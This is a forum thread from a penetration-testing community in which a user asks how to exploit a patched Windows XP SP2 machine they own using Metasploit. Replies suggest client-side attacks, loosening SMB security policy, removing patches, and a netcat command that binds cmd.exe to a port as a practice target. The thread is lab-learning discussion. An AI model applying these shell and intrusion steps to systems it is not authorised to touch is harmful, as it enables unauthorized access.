Metasploit doesn't have everything. Try going to milw0rm.com
Need Help Finding Exploits for Windows XP SP2
Hello, this is my first post on the Remote Exploit forums, but I have a moderate amount of experience with Linux and I have been learning about BackTrack for about a week now. I've learned quite a lot about decrypting WEP keys, and just how simple it is. After I realized just how insecure WEP is, I changed my network encryption to a 63-character WPA2 key with AES and TKIP. Since my wireless network is now mostly secure, I don't think I have to worry about anyone using my internet connection, but I would like to learn how to exploit a Windows Machine that I own. The system that I am trying to gain access to using metasploit is owned by me. I am doing this for educational purposes only, and I was wondering if you guys could help me learn how to gain access to the computer using metasploit. I have read a bit about how the exploits are done, but I haven't been able to figure out how to get MetaSploit to work. Here are some details about my configuration:
* The (home) network I am on is owned by me. The access point is called "YNXA7". It is encrypted wirelessly using WPA2 and a 63-character key generated from GRC.
* The computer I am attempting to run the exploit from is connected to the network wirelessly, and is given the IP address of 192.168.1.2 by DHCP.
* The computer which I am testing for vulnerability to exploits is on the IP address of 192.168.1.3, and it is running Windows XP SP2. It has few programs installed except for the default software and McAfee Total Protection. All Windows Updates have been installed.
* The name of the windows workgroup is "WORKGROUP", and because the machine is intended to be the target of the attack, I set it's network name to VICTIM.home
After running nmap on the computer using nmap -sU 192.168.1.3, here is the output I get:
Starting Nmap 4.60 ( hxxp:\\nmap.org ) at 2009-01-26 18:55 GMT
Interesting ports on VICTIM.home (192.168.1.3):
Not shown: 1482 closed ports
PORT STATE SERVICE
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
1900/udp open|filtered UPnP
4500/udp open|filtered sae-urn
MAC Address: 00:16:6F:68:A0:6E (Intel)
Nmap done: 1 IP address (1 host up) scanned in 6.502 seconds
I have MetaSploit 3 running on the computer that I have backtrack on at the default web address of hxxp:\\127.0.0.1:55555, and I have unsuccessfully tried a MSRPC exploit. Sorry for the weird URL formatting but I'm not allowed to post URLs yet.
Could anyone help me figure out how it would be possible to exploit on this computer?
Metasploit doesn't have everything. Try going to milw0rm.com
This is your problem. Try finding some vulnerable software exploits from Metasploit and add them to your XP machine (FTP, SMTP, IMAP, etc). Or you can try initiate client side attacks through email or IE.All Windows Updates have been installed.
I have had this issue as well. When you review targets under BackTrack. Most of the targets are 2k, XP SP1 machines. Being that it is not possible in my knowledge to downgrade from SP2 to 1, this makes testing difficult for me. in addition, I have never had success downloading updates to Bt, however that is be expected, as I have never succesfully installed a version of BT to a computer. (I was so close!)
"You're only smoke and mirrors..."
Let me see if I understand this. You have a FULLY patched XP SP2 box and you want to exploit it using metasploit (i.e. publicly available exploits)?Originally Posted by aliendude5300
If it is FULLY patched, then generally speaking, no public exploits should work (there may be some that could work given some kind of specific set up). But in general, if it is fully patched, you either need some kind of misconfiguration or a 0-day exploit.
You could change the group policy to allow "classic" network logins. That will open up the potential for some SMB type attacks. Go to Administrative Tools > Local Security Policy > Security Options and change "Network access: Sharing and security model for local accounts" from Guest Only to Classic.
Now you can login remotely using one of the local accounts (such as administrator). You will also need to set an administrator password.
Good Luck...
Metasploit is nice to do a quick and dirty test but if you want to get into a machine often Metasploit automatic exploitation isn't working the way you want it to.
The best would be to learn how exploits work, how to find them and how to write/modify exploits.
As said before if the machine is fully patched you can most likely just do attacks which involve someone on the victim machine to open (email/website/playlist...).
Tiocfaidh ár lá
I agree. And an excellent playground when starting out learning how exploits work is PwnOS, which can be downloaded from http://forums.heorot.net/.
-Monkeys are like nature's humans.
cat /pentest/exploits/milw0rm/sploitlist.txt | grep XP
but as stated by others your problem probably lies in the fact that you have fully patched your machine, so if you have a fully isolated network than uninstall/remove the patches
open source = open minds, human knowledge belongs to the world
Search this forum for title with " Metasploiting for BT3 - Reverse TCP", select the first one by phoenix910. I would download the pdf file (link can be found inside the description).As said before if the machine is fully patched you can most likely just do attacks which involve someone on the victim machine to open (email/website/playlist...).
This tut is an excellent piece of work, a very helpful writing with friendly approach. And, it works perfectly........ i checked on BT3 platform. Works fine no matter victim is Vista/XP, firewall On/Off......:-)
Hi,
If you are looking for practicing Metasploit, then as suggested by other members, you need to have some vulnerability on your XP SP2 machine.
First thing which i don't understand at your part is why you did only UDP scanning of the target machine (-sU)? You should have scanned TCP as well.
Anyways, for practicing Metasploit, lookout of netcat NT 1.10 version. It's vulnerable when you run it as follow:
# nc.exe -v -L -p 8080 -e cmd.exe
v: verbose
L: listen harder i.e. even after disconnecting once it should get ready for listening again
p: port to listen on
e: program to execute
with NT 1.10 version, -e is the vulnerable part. Metaploit has exploit for it.
You may need to either shut your firewall or allow exception for port 8080 or you may go for reverse connect from XP SP2 to your attacking machine.
From here onwards i can spoon feed you for both the scenarios, but better you look your own for these two conditions.
Let us know if you stuck at any point, but we expect you to google 10 times before you ask here something.
rgds
fr0zen sm0ke
Posting Permissions